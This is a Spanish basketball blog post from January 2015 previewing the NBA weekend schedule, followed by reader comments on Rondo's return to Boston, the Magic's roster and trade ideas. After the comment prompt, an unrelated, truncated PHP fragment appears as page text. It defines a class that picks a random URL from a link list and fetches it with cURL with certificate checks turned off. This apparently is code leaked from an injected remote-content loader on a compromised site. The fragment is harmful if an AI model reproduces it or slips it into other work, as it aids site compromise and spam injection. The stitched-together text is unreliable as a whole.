Fin de semana: Hagamos un trato

02 de January de 2015 por MagicJohnson32

El 2015 ya es una realidad. Si algo nos ha enseñado el cine es que este año seremos propietarios de un monopatín volador pero mientras llega el momento os proponemos… bueno, lo de cada fin de semana. Os dejamos aquí un resumen de lo que podremos ver estos próximos días en la NBA y vosotros lo vais comentando. ¿Trato hecho?

Por cierto, entre lo más destacado hay algo de viaje en el tiempo con la visita de Rondo y los Mavs a Boston. Todo encaja.

Rondo Mavs

Viernes

El primer fin de semana del año lo abren a la 01h00 los Cavs-sans-LeBron en pista de los Hornets. A la misma hora, Nets vs Magic. A la 1h30, cita emotiva con el primer partido de Rajon Rondo en Boston como visitante, así como un Pistons vs Knicks. Dos partidos excelentes arrancan a las 2h00: Rockets @ Pelicans y Wizards @ Thunder. Pacers y Bucks se enfrentan a partir de las 2h30, seguidos media hora más tarde por un Sixers-Suns y Hawks-Jazz. Los más trasnochadores obtendrán recompensa en forma de un duelo entre los mejores de cada conferencia, Raptors-Warriors (4h30), que comparte intespestivo horario con el Grizzlies-Lakers.

Sábado

La jornada del sábado llega menos cargada de partidos y de interés. Tras el Hornets-Magic de la 1h00, tres partidos dan inicio a las 2h00: Celtics-Bulls, Heat-Rockets y Jazz-Wolves. Tal vez el mejor encuentro de la noche sea el Wizards-Spurs (2h30) aunque también se presentan repletos de alicientes el Grizzlies-Nuggets (3h00) y el Hawks-Blazers (4h00). Cierran jornada Sixers y Clippers a partir de las 4h30.

Domingo

Sin LeBron pero con un horario de los que nos gustan (19h00), los Cavs reciben a los Mavs en el primer partido del domingo. A medianoche arrancan Kings-Pistons y Nets-Heat; a la 1h30 los Bucks tratarán de ahondar en las penas de los Knicks; los Raptors siguen con su gira por el Oeste y visitarán a los Suns a partir de las 2h00 y el fin de semana concluirá con un Pacers-Lakers en el horario habitual para los partidos dominicales en el Staples (3h30).

Comenta

17 comentarios a esta entrada

  1. Triceratops dice:
    #1

    No sigo mucho a los Nets, quizás es más habitual de lo que pienso, pero me sorprende que Hollins salga con Deron y Lopez desde el banco. Ayer al menos, ese ajuste les salió bien porque ambos hicieron un extraordinario partido. Pero vaya pajara de íltimo cuarto, estuvieron a punto de desperdiciar los 24 puntos de ventaja con los que llegaron a contar a 10 minutos del final.
    Por Orlando, destacar a Payton, vaya madera de base de los buenos tiene ese chaval. Ayer se quedó a un rebote del triple doble (16-9-10). Si consiguiese en verano mejorar su tiro exterior ó al menos dejarse de tirar airballs desde la linea de tiros libres, este tio tiene clase para ser All Star y estar los próximos 10 años entre los 5 mejores asistentes de la liga.

    Sobre Rondo, vaya si estaría motivado el jodido en su vuelta a Boston, que hizo un 5/7 en triples (y 12 de 17 en TC). Me cuesta imaginar que alguna vez haya metido más de 5 triples.

      Citar

  2. rumbero dice:
    #2

    Triceratops:
    Sobre Rondo, vaya si estaría motivado el jodido en su vuelta a Boston, que hizo un 5/7 en triples (y 12 de 17 en TC). Me cuesta imaginar que alguna vez haya metido más de 5 triples.

    Pues no, nunca los había metido hasta ayer. Un cachondo el amigo Rondo.
    El otro nombre de la noche puede que sea el de Draymond Green. Cada vez sorprendre menos con sus actuaciones, pero el triple doble para tumbar a los Raptors demuestra lo que siempre decimos de él, jugador total, un lujazo para los Warriors. Viene bien recordar que pasó 4 años en la universidad, como Lillard por ejemplo. Luego pues bueno, el festival anotador de Curry de cada día y lo de Speights que sigue alucinándome.

      Citar

  3. jhc dice:
    #3

    los Hawks lideres del este… pena que esta noche juguemos contra Blazzers que poquito nos va durar el liderato

      Citar

  4. Triceratops dice:
    #4

    jhc:
    los Hawks lideres del este… pena que esta noche juguemos contra Blazzers que poquito nos va durar el liderato

    jajaja, hoy tu y hace unos días también Nacho dijo “Blazzers” en vez de lo correcto Blazers (con una Z). Creo que os está traicionando el subsconciente con esa famosa compañía …Brazzers jajajaja.

    Bueno, que os parece la decisión de pirarse a China de Emmanuel Mudiay quien se debe jugar el puesto 1 del proximo Draft con Jahill Okafor. Está promediando un 17-6-6 pero no sé yo si esos datos son muy fiables para una liga que por los números que se marcan allí los jugadores , parece que tiene el nivel de un choque de solteros contra casados.
    Por poner un ejemplo, ayer un tal Willie Warren hizo 51 puntos con 17/22 en tiros de campo, el amigo Andray Blatche 41-16 con 17/22 en TC, el porreta Michael Beasley hizo 55 puntos (21/32 en TC) y 16 rebotes, un paquetillo como Shelden Williams se marcó un 20-18, y el veterano Charles Gaines (ex del Juventut) hizo un 37-13.

    Así de primeras y sin conocer la liga china, creo que poco va a crecer Mudiay jugando en este “nivel”.

      Citar

  5. luismi_vallecas dice:
    #5

    Triceratops: jajaja, hoy tu y hace unos días también Nacho dijo “Blazzers” en vez de lo correcto Blazers (con una Z). Creo que os está traicionando el subsconciente con esa famosa compañía …Brazzers jajajaja.

    Bueno, que os parece la decisión de pirarse a China de Emmanuel Mudiay quien se debe jugar el puesto 1 del proximo Draft con Jahill Okafor. Está promediando un 17-6-6 pero no sé yo si esos datos son muy fiables para una liga que por los números que se marcan allí los jugadores , parece que tiene el nivel de un choque de solteros contra casados.Por poner un ejemplo, ayer un tal Willie Warren hizo 51puntos con 17/22 en tiros de campo, el amigo Andray Blatche 41-16 con 17/22 en TC, el porreta Michael Beasley hizo 55 puntos (21/32 en TC) y 16 rebotes,un paquetillo como Shelden Williams se marcó un 20-18, y el veterano Charles Gaines (ex del Juventut) hizo un 37-13.

    Así de primeras y sin conocer la liga china, creo que poco va a crecer Mudiay jugando en este “nivel”.

    yo creo que la liga china de baloncesto es como la brasileña y las árabes de fútbol, ahí van los jugadores que están acabados y los que no quiere nadie. Por cierto, he pensado lo mismo con Blazzers y Brazzers jajaja

      Citar

  6. Larry Bird 33 dice:
    #6

    Buenas noches es la primera vez que comento aunque me gustaría empezar a hacerlo más a menudo ya que me encanta esta web y leo todos los artículos con sus respectivos comentarios a diario. Respecto a los partidos de ayer por la noche vi el Houston-Pelicans, merecida victoria de los Pelicans con una buena actuación de Tyreke Evans y de Holiday pese a que no hizo grandes números en un mal partido de Davis, respecto a Houston no me gusta nada como juegan, Howard está fatal en todos los aspectos y en general el equipo no juega a nada en ataque simplemente le dan el balón a Harden y mediante un aclarado el se encarga de anotar/asistir/crear espacios o lo que haga falta. Personalmente creo que Harden los puede guiar hasta los PO tranquilamente pero una vez allí si nada cambia pienso que se irán a casa en 1 ronda y sin poner en demasiados aprietos a su rival.
    Por cierto soy seguidor de los Magic, creo que por aquí hay alguno, ¿como los veis?
    Un saludo y feliz año.

      Citar

  7. Ruxixón dice:
    #7

    jhc:
    los Hawks lideres del este… pena que esta noche juguemos contra Blazzers que poquito nos va durar el liderato

    Ojito a la tontería de los Hawks que a la chita callando primeros y ganando en el Moda Center para alegría de nuestro compañero 😉

      Citar

  8. Triceratops dice:
    #8

    Larry Bird 33:

    Por cierto soy seguidor de los Magic, creo que por aquí hay alguno, ¿como los veis?
    Un saludo y feliz año.

    Sip, yo soy de los Magic (hasta el año pasado escribía como “Denise”). Creo que el año que viene hay que dar un golpe de timón sino la franquicia se va a venir abajo, más de lo que ya está, tanto en marca comercial como en seguidores. Desde Howard no se ha traido a nadie ilusionante y en el verano, desde arriba se debería hacer un esfuerzo en mantener a Tobias Harris y pescar algo interesante en el mercado de agentes libres ,aunque sea a costa de sobrepagar a ambos. También se debe buscar una salida urgente a Channing Frye, y destituir a ese pseudoentrenador Vaughn y contratar a uno de garantías, George Karl me parecería cojonudo, y el recien despedido de los Kings Michael Malone también me gusta ó Nate McMillan.

    Respecto a lo que va a dar de sí esta temporada, quedaremos antepenúltimos de la pésima Conferencia Este solo por delante de los pateticos Knicks y de los tankeadores 76ers. Y mira que están baratos los Playoffs del Este!!, pues ni por esas los oleremos. Hay una buena base de chicos jovenes (Payton, Oladipo, Gordon, Fournier, Vucevic y el maltratado Harkless) , es hora de que Hennigan tome el mando y atraiga un verdadero jugador franquicia a este equipo, si no en la agencia libre, sacrificaría a Oladipo en un trade.

      Citar

  9. rumbero dice:
    #9

    No me había enterado yo de tu cambio de nick Denise. Si te hubiera leído antes rajar de Vaughn seguro que me hubiera percatado 😀

    En el Cavs-Mavs se está viendo que Love es otro cuando no anda Lebron por ahí. Lo de defender ya sabemos como lo lleva pero está siendo el que aguanta a los Cavs. 21 puntos y queda medio partido. No se yo si va a ser suficiente para aguntar el ritmo que imponen los Mavs eso si (que bueno tiene que ser Carlisle para que me guste Barea cuando lo entrena él) Por otro lado, infame el partido que se está marcando Waiters cuando es el otro que tiene que demostrar algo al no estar Lebron. 0/7 con un par de mandarinas de las buenas.

      Citar

  10. Triceratops dice:
    #10

    Vaya pintaza de anillo que tienen los Mavs, sólo les hace faltar conseguir algun center suplente, el tipico veterano que se arrastra en febrero buscando el anillo, porque en el rebote sufren bastante y ojo que como Chandler se lesiones, se les queda un solar. Pero confío en la inteligencia de Cuban y seguro que pilla algo en el Deadline.
    A todo esto…¿Kenion Martin y Jermaine O’Neal estan libres, no? Pues uno de éstos, no les vendría mal.

      Citar

  11. rumbero dice:
    #11

    Triceratops:
    Vaya pintaza de anillo que tienen los Mavs, sólo les hace faltar conseguir algun center suplente, el tipico veterano que se arrastra en febrero buscando el anillo, porque en el rebote sufren bastante y ojo que como Chandler se lesiones, se les queda un solar. Pero confío en la inteligencia de Cuban y seguro que pilla algo en el Deadline.
    A todo esto…¿Kenion Martin y Jermaine O’Neal estan libres, no? Pues uno de éstos, no les vendría mal.

    Andan tras O’Neal, pero este tiene ya unas cuantas novias y se está haciendo de rogar. Pero como dices, algo se traerá Cuban seguro. A mi también me gusta mucho el equipo a falta de ver todo los que le puede dar Rondo, que es mucho. El único pero que les veo es que están en el oeste. Los Cavs hoy parecían los Wolves de los últimos años, con un gran Love pero palmando de 20 ya en el último cuarto

      Citar

  12. MagicJohnson32 dice:
    #12

    rumbero: Andan tras O’Neal, pero este tiene ya unas cuantas novias y se está haciendo de rogar. Pero como dices, algo se traerá Cuban seguro. A mi también me gusta mucho el equipo a falta de ver todo los que le puede dar Rondo, que es mucho.El único pero que les veo es que están en el oeste. Los Cavs hoy parecían los Wolves de los últimos años, con un gran Love pero palmando de 20 ya en el último cuarto

    Estos Cavs, sin LeBron ni Varejao, y con Kyrie a medias, son incluso peores que aquellos Wolves. Nada que rascar ante un equipazo como los Mavs. Love los ha mantenido en el partido hasta el tercer cuarto pero al final la cosa ha caído por su propio peso teniendo en cuenta la diferencia de calidad entre ambas plantillas y el agujero que tienen los Cavs en la pintura. Desastroso Waiters una vez más, no ha hecho nada a derechas hasta que el partido estaba sentenciado.

      Citar

  13. luismi_vallecas dice:
    #13

    yo creo que los cavs necesitan firmar a un tirador de la agencia libre y traspasar a Waiters por un pivot del estilo Mozgov o Koufos.

      Citar

  14. Larry Bird 33 dice:
    #14

    Triceratops: Sip, yo soy de los Magic (hasta el año pasado escribía como “Denise”). Creo que el año que viene hay que dar un golpe de timón sino la franquicia se va a venir abajo, más de lo que ya está, tanto en marca comercial como en seguidores. Desde Howard no se ha traido a nadie ilusionante y en el verano, desde arriba se debería hacer un esfuerzo en mantener a Tobias Harris y pescar algo interesante en el mercado de agentes libres ,aunque sea a costa de sobrepagar a ambos. También se debe buscar una salida urgente a Channing Frye, y destituir a ese pseudoentrenador Vaughn y contratar a uno de garantías, George Karl me parecería cojonudo, y el recien despedido de los Kings Michael Malone también me gusta ó Nate McMillan.

    Respecto a lo que va a dar de sí esta temporada, quedaremos antepenúltimos de la pésima Conferencia Este solo por delante de los pateticos Knicks y de los tankeadores 76ers. Y mira que están baratos los Playoffs del Este!!, pues ni por esas los oleremos. Hay una buena base de chicos jovenes (Payton, Oladipo, Gordon, Fournier, Vucevic y el maltratadoHarkless) , es hora de que Hennigan tome el mando y atraiga un verdadero jugador franquicia a este equipo, si no en la agencia libre, sacrificaría a Oladipo en un trade.

    Si te había leído como denise, tenemos un punto de vista similar, yo tampoco aguanto a nuestro “entrenador” y lo de Frye estoy de acuerdo en traspasarlo como sea al igual que deberíamos dejar jugar a Harkless sus 25 mpp mínimo. Desde mi punto tenemos una plantilla con un gran potencial defensivo (quizás para llegar a ser la mejor defensa de la NBA con Payton, Harkless, Oladipo, Dedmon que me está gustando pese a que ofensivamente es limitado le veo buenas maneras en defensa) pero nos falta una estrella y tiradores. El próximo verano intentaría fichar a Monroe a Matthews y a Beverley e intentaría colocar a Frye a cambio de una segunda ronda o lo que sea cualquier cosa me iría bien. Traspasando a Frye nos quedarían 30 kilos aprox para negociar con 15 kilos a Monroe y otros 15 a Matthews creo que estaría bien y luego habría que renovar a Harris pero ya entrarían en el impuesto de lujo por tanto si no lo quieren pagar buscaría un sign&trade con algún equipo que tenga espacio salarial y nos pueda ofrecer una ronda (NYK por ejemplo) o a uno o varios jugadores con contratos bajos. Y por último en el draft escogería a Looney o Johnson que son dos aleros
    El equipo quedaría así más o menos:
    PG: Payton-Beverley.
    SG: Matthews- Oladipo-Fournier.
    SF: Harkless- (draft pick)- Gordon
    PF: Monroe- Nicholson- O’Quinn
    C: Vucevic- Dedmon.
    Es equipo es de PO sobrado y con potencial.

      Citar

  15. Triceratops dice:
    #15

    Larry Bird 33: Si te había leído como denise, tenemos un punto de vista similar, yo tampoco aguanto a nuestro “entrenador” y lo deFrye estoy de acuerdo en traspasarlo como sea al igual que deberíamos dejar jugar a Harkless sus 25 mpp mínimo. Desde mi punto tenemos una plantilla con un gran potencial defensivo (quizás para llegar a ser la mejor defensa de la NBA con Payton, Harkless, Oladipo, Dedmon que me está gustando pese a que ofensivamente es limitado le veo buenas maneras en defensa) pero nos falta una estrella y tiradores. El próximo verano intentaría fichar a Monroe a Matthews y a Beverley e intentaría colocar a Frye a cambio de una segunda ronda o lo que sea cualquier cosa me iría bien. Traspasando a Frye nos quedarían 30 kilos aprox para negociar con 15 kilos a Monroe y otros 15 a Matthews creo que estaría bien y luego habría que renovar a Harris pero ya entrarían en el impuesto de lujo por tanto si no lo quieren pagar buscaría un sign&trade con algún equipo que tenga espacio salarial y nos pueda ofrecer una ronda (NYK por ejemplo) o a uno o varios jugadores con contratos bajos. Y por último en el draft escogería a Looney o Johnson que son dos aleros
    El equipo quedaría así más o menos:
    PG: Payton-Beverley.
    SG: Matthews- Oladipo-Fournier.
    SF: Harkless- (draft pick)- Gordon
    PF: Monroe- Nicholson- O’Quinn
    C: Vucevic- Dedmon.
    Es equipo es de PO sobrado y con potencial.

    Me gusta tu idea, pero no sé hasta que punto, Gordon podría jugar de SF, a dia de hoy, me cuesta verlo persiguiendo por toda la pista a gente como Lebron ó a Durant.
    Respecto a lo de Greg Monroe, yo preferiría volver a traer a Ryan Anderson, ya que el equipo cuenta con bastantes carencias en el triple. El inconveniente es que una pareja interior Anderson-Vucevic sería la peor defensivamente en toda la liga.

      Citar

  16. Larry Bird 33 dice:
    #16

    Triceratops: Me gusta tu idea, pero no sé hasta que punto, Gordon podría jugar de SF, a dia de hoy, me cuesta verlo persiguiendo por toda la pista a gente como Lebron ó a Durant.
    Respecto a lo de Greg Monroe, yo preferiría volver a traer a Ryan Anderson, ya que el equipo cuenta con bastantes carencias en el triple. El inconveniente es que una pareja interior Anderson-Vucevic sería la peor defensivamente en toda la liga.

    También es buena idea el problema es que a Anderson le queda un año más de contrato, ¿a quien darías por el? ¿Quizás un S&T por Harris? Otra opción si traes a Anderson es intentar traspasar a Vucevic más Fournier a cambio de Drummond aunque no se si Detroit estaría muy por la labor o intentar un trade Harris por Nerlens Noel que en esa situación creo que sería un win-win para los dos equipos ya que nosotros ganamos un center defensivo y ellos un tres-cuatro que puede anotar y dejan el cinco libre para Embiid.
    Respecto a Gordon yo también lo prefiero como 4 pero saliendo desde el banquillo me parece que podría jugar 10 mpp por partido de 3 y otro 10-15 de 4 para dar descanso tanto a Harkless como a Monroe/Anderson y en un futuro ya se vería si puede defender a los 3 rivales. De todas formas me parece que estos dos próximos veranos tenemos muchas opciones para formar un equipo serio de una vez, eso sí antes de nada necesitamos un entrenador decente, las opciones que distes me gustan bastante.
    Un saludo, es un placer hablar contigo.

      Citar

  17. Triceratops dice:
    #17

    Larry Bird 33: También es buena idea el problema es que a Anderson le queda un año más de contrato, ¿a quien darías por el? ¿Quizás un S&T por Harris? Otra opción si traes a Anderson es intentar traspasar a Vucevic más Fournier a cambio de Drummond aunque no se si Detroit estaría muy por la labor o intentar un trade Harris por Nerlens Noel que en esa situación creo que sería un win-win para los dos equipos ya que nosotros ganamos un center defensivo y ellos un tres-cuatro que puede anotar y dejan el cinco libre para Embiid.
    Respecto a Gordon yo también lo prefiero como 4 pero saliendo desde el banquillo me parece que podría jugar 10 mpp por partido de 3 y otro 10-15 de 4 para dar descanso tanto a Harkless como a Monroe/Anderson y en un futuro ya se vería si puede defender a los 3 rivales. De todas formas me parece que estos dos próximos veranos tenemos muchas opciones para formar un equipo serio de una vez, eso sí antes de nada necesitamos un entrenador decente, las opciones que distes me gustan bastante.
    Un saludo, es un placer hablar contigo.

    Tienes razón, a Anderson le queda un año más, yo pensaba que era agente libre ya este verano.
    Vucevic y Payton son intransferibles ahora mismo para mi. Lo prioritario debe ser renovar a Harris, se habla de que va a pedir entre 12 y 14 kilos. Yo estaría dispuesto a hacer ese esfuerzo y pagarle tal cantidad.
    El año que viene deben entrar ya en Playoffs si o si, si no quieren tener los dueños el pabellón semivacio y que no empiece el run-run de mover la franquicia a otra ciudad ó con otra marca..
    Un placer tambien hablar contigo..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>